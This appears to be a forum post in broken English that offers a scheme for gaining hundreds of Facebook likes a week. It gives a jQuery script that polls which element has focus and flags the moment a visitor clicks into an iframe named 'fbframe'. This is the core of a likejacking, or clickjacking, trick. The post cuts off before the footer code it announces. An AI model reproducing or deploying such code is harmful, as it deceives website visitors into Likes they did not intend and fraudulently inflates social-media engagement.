hello
i show that how make facebook like more than 200 like/10 hours
and get 700 like/per week
follow link
Available to users only
For any help contact Available to users only
Script
---------------------------------------------
First download "jquery-1.4.2.min.js" the version IS important:
php Code:
Code
http://code.jquery.com/jquery-1.4.2.min.js
Place this in your header section, right below :
Code
<script src="jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript">
var interval;
$(function()
{
interval=setInterval("updateActiveElement();", 50);
});
function updateActiveElement()
{
if ( $(document.activeElement).attr('id')=="fbframe" )
{
clearInterval(interval);
iflag=1;
}
}
</script>
Insert this into your footer section right before